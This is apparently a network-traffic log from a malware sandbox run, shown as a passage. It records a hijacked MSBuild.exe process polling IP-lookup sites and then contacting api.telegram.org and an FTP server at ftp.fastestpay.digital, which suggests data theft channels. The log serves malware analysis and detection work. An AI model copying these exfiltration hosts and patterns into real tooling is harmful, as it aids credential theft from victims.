                                                        Sep 25, 2024 18:50:30.955152988 CEST49711443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:30.987107038 CEST4971280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:30.993143082 CEST8049712158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:30.993247032 CEST4971280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:30.993423939 CEST4971280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:30.999166965 CEST8049712158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:31.583887100 CEST8049712158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:31.585115910 CEST49713443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:31.585159063 CEST44349713188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:31.585215092 CEST49713443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:31.585457087 CEST49713443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:31.585468054 CEST44349713188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:31.630238056 CEST4971280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:32.044315100 CEST44349713188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:32.046073914 CEST49713443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:32.046103001 CEST44349713188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:32.229197025 CEST44349713188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:32.229306936 CEST44349713188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:32.229361057 CEST49713443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:32.229820013 CEST49713443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:32.233043909 CEST4971280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:32.234184980 CEST4971580192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:32.239061117 CEST8049715158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:32.239171982 CEST4971580192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:32.239195108 CEST8049712158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:32.239262104 CEST4971280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:32.239438057 CEST4971580192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:32.244546890 CEST8049715158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:32.827362061 CEST8049715158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:32.828762054 CEST49717443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:32.828830957 CEST44349717188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:32.828957081 CEST49717443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:32.829179049 CEST49717443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:32.829194069 CEST44349717188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:32.880364895 CEST4971580192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:33.336299896 CEST44349717188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:33.347768068 CEST49717443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:33.347821951 CEST44349717188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:33.477098942 CEST44349717188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:33.477334976 CEST44349717188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:33.477461100 CEST49717443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:33.477766991 CEST49717443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:33.481291056 CEST4971580192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:33.482655048 CEST4971980192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:33.486588955 CEST8049715158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:33.486681938 CEST4971580192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:33.487521887 CEST8049719158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:33.487612009 CEST4971980192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:33.487730026 CEST4971980192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:33.492666006 CEST8049719158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:35.050544977 CEST8049719158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:35.051843882 CEST49721443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:35.051884890 CEST44349721188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:35.052018881 CEST49721443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:35.052714109 CEST49721443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:35.052727938 CEST44349721188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:35.098988056 CEST4971980192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:35.551023006 CEST44349721188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:35.552959919 CEST49721443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:35.553000927 CEST44349721188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:35.699641943 CEST44349721188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:35.699934959 CEST44349721188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:35.700081110 CEST49721443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:35.700361013 CEST49721443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:35.703522921 CEST4971980192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:35.704718113 CEST4972280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:35.709163904 CEST8049719158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:35.709233999 CEST4971980192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:35.710244894 CEST8049722158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:35.710311890 CEST4972280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:35.710405111 CEST4972280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:35.716044903 CEST8049722158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:39.297323942 CEST8049722158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:39.348958969 CEST4972280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:39.508399963 CEST4972280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:39.511831045 CEST4972780192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:39.513577938 CEST8049722158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:39.513624907 CEST4972280192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:39.516894102 CEST8049727158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:39.516969919 CEST4972780192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:39.517070055 CEST4972780192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:39.522000074 CEST8049727158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:39.630300999 CEST49677443192.168.2.720.50.201.200
                                                        Sep 25, 2024 18:50:42.078614950 CEST8049727158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:42.079968929 CEST49731443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:42.080013990 CEST44349731188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:42.080101013 CEST49731443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:42.080372095 CEST49731443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:42.080380917 CEST44349731188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:42.130218029 CEST4972780192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:42.594897032 CEST44349731188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:42.609523058 CEST49731443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:42.609580994 CEST44349731188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:42.737198114 CEST44349731188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:42.737312078 CEST44349731188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:42.737386942 CEST49731443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:42.746630907 CEST49731443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:42.923114061 CEST4972780192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:42.928540945 CEST8049727158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:42.928606033 CEST4972780192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:42.931128025 CEST49732443192.168.2.7149.154.167.220
                                                        Sep 25, 2024 18:50:42.931174994 CEST44349732149.154.167.220192.168.2.7
                                                        Sep 25, 2024 18:50:42.931226969 CEST49732443192.168.2.7149.154.167.220
                                                        Sep 25, 2024 18:50:42.931575060 CEST49732443192.168.2.7149.154.167.220
                                                        Sep 25, 2024 18:50:42.931591034 CEST44349732149.154.167.220192.168.2.7
                                                        Sep 25, 2024 18:50:43.596052885 CEST44349732149.154.167.220192.168.2.7
                                                        Sep 25, 2024 18:50:43.596193075 CEST49732443192.168.2.7149.154.167.220
                                                        Sep 25, 2024 18:50:43.600033998 CEST49732443192.168.2.7149.154.167.220
                                                        Sep 25, 2024 18:50:43.600055933 CEST44349732149.154.167.220192.168.2.7
                                                        Sep 25, 2024 18:50:43.600326061 CEST44349732149.154.167.220192.168.2.7
                                                        Sep 25, 2024 18:50:43.601839066 CEST49732443192.168.2.7149.154.167.220
                                                        Sep 25, 2024 18:50:43.647409916 CEST44349732149.154.167.220192.168.2.7
                                                        Sep 25, 2024 18:50:43.852338076 CEST44349732149.154.167.220192.168.2.7
                                                        Sep 25, 2024 18:50:43.852421045 CEST44349732149.154.167.220192.168.2.7
                                                        Sep 25, 2024 18:50:43.852493048 CEST49732443192.168.2.7149.154.167.220
                                                        Sep 25, 2024 18:50:43.852981091 CEST49732443192.168.2.7149.154.167.220
                                                        Sep 25, 2024 18:50:49.044960976 CEST4971080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:49.476592064 CEST4973321192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:49.481724977 CEST2149733192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:49.481838942 CEST4973321192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:49.483525991 CEST4973321192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:49.488477945 CEST2149733192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:49.488584995 CEST4973321192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:50.992445946 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:50.999097109 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:50.999198914 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:51.631582975 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:51.631845951 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:51.636795998 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:51.800518990 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:51.800785065 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:51.805644989 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.144313097 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.144525051 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:52.149492025 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.426245928 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.426471949 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:52.431457043 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.632359028 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.632617950 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:52.637609005 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.809649944 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.809813976 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:52.820214033 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.985399008 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.986135006 CEST4973512044192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:52.991046906 CEST1204449735192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:52.991146088 CEST4973512044192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:52.991204977 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:52.996148109 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:53.527370930 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:53.527754068 CEST4973512044192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:53.527849913 CEST4973512044192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:53.532732964 CEST1204449735192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:53.533165932 CEST1204449735192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:53.533243895 CEST4973512044192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:53.567842007 CEST4973421192.168.2.7192.64.117.204
                                                        Sep 25, 2024 18:50:53.700197935 CEST2149734192.64.117.204192.168.2.7
                                                        Sep 25, 2024 18:50:53.739712954 CEST4973421192.168.2.7192.64.117.204
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 25, 2024 18:50:21.098022938 CEST6004153192.168.2.71.1.1.1
                                                        Sep 25, 2024 18:50:21.404546976 CEST6211253192.168.2.71.1.1.1
                                                        Sep 25, 2024 18:50:21.412220955 CEST53621121.1.1.1192.168.2.7
                                                        Sep 25, 2024 18:50:26.441977978 CEST5495753192.168.2.71.1.1.1
                                                        Sep 25, 2024 18:50:26.498349905 CEST53549571.1.1.1192.168.2.7
                                                        Sep 25, 2024 18:50:42.923666954 CEST6150753192.168.2.71.1.1.1
                                                        Sep 25, 2024 18:50:42.930602074 CEST53615071.1.1.1192.168.2.7
                                                        Sep 25, 2024 18:50:49.217139006 CEST4991853192.168.2.71.1.1.1
                                                        Sep 25, 2024 18:50:49.475786924 CEST53499181.1.1.1192.168.2.7
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 25, 2024 18:50:21.098022938 CEST192.168.2.71.1.1.10x81a8Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:21.404546976 CEST192.168.2.71.1.1.10x219dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:26.441977978 CEST192.168.2.71.1.1.10xbbbbStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:42.923666954 CEST192.168.2.71.1.1.10x1536Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:49.217139006 CEST192.168.2.71.1.1.10x1dc5Standard query (0)ftp.fastestpay.digitalA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 25, 2024 18:50:21.115210056 CEST1.1.1.1192.168.2.70x81a8No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 25, 2024 18:50:21.412220955 CEST1.1.1.1192.168.2.70x219dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                        Sep 25, 2024 18:50:21.412220955 CEST1.1.1.1192.168.2.70x219dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:21.412220955 CEST1.1.1.1192.168.2.70x219dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:21.412220955 CEST1.1.1.1192.168.2.70x219dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:21.412220955 CEST1.1.1.1192.168.2.70x219dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:21.412220955 CEST1.1.1.1192.168.2.70x219dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:25.523742914 CEST1.1.1.1192.168.2.70x2760No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:25.523742914 CEST1.1.1.1192.168.2.70x2760No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:26.498349905 CEST1.1.1.1192.168.2.70xbbbbNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:26.498349905 CEST1.1.1.1192.168.2.70xbbbbNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:42.930602074 CEST1.1.1.1192.168.2.70x1536No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 18:50:49.475786924 CEST1.1.1.1192.168.2.70x1dc5No error (0)ftp.fastestpay.digital192.64.117.204A (IP address)IN (0x0001)false
                                                        • reallyfreegeoip.org
                                                        • api.telegram.org
                                                        • checkip.dyndns.org
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.749700158.101.44.242807860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 18:50:22.069665909 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Sep 25, 2024 18:50:24.270399094 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:24 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 0fc0cea3d7c615cb45ab5500fe2699dc
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                        Sep 25, 2024 18:50:24.281910896 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 25, 2024 18:50:26.331159115 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:26 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: de33b42a3e877568a07bbff1cee7887a
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                        Sep 25, 2024 18:50:27.495405912 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 25, 2024 18:50:27.657648087 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:27 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: dfbad2923289082662d6a3a3bd9a8119
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.749708158.101.44.242807860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 18:50:28.571722984 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 25, 2024 18:50:29.083614111 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 7d246b18265ca64d8b2d7e6b83d0ae10
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.749710158.101.44.242807860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 18:50:29.710875034 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 25, 2024 18:50:30.314979076 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:30 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 9c9777691039a84a57a9d6485caa1fee
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.749712158.101.44.242807860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 18:50:30.993423939 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Sep 25, 2024 18:50:31.583887100 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:31 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 2be9e4554b264461bee3ca7adeb35661
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.749715158.101.44.242807860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 18:50:32.239438057 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Sep 25, 2024 18:50:32.827362061 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 7c9e56713b5205c2a6d5cf3385bd2253
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.749719158.101.44.242807860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 18:50:33.487730026 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Sep 25, 2024 18:50:35.050544977 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 2e5e58a37ad08775e61a43a5938d3ae6
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.749722158.101.44.242807860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 18:50:35.710405111 CEST151OUTGET / HTTP/1.1
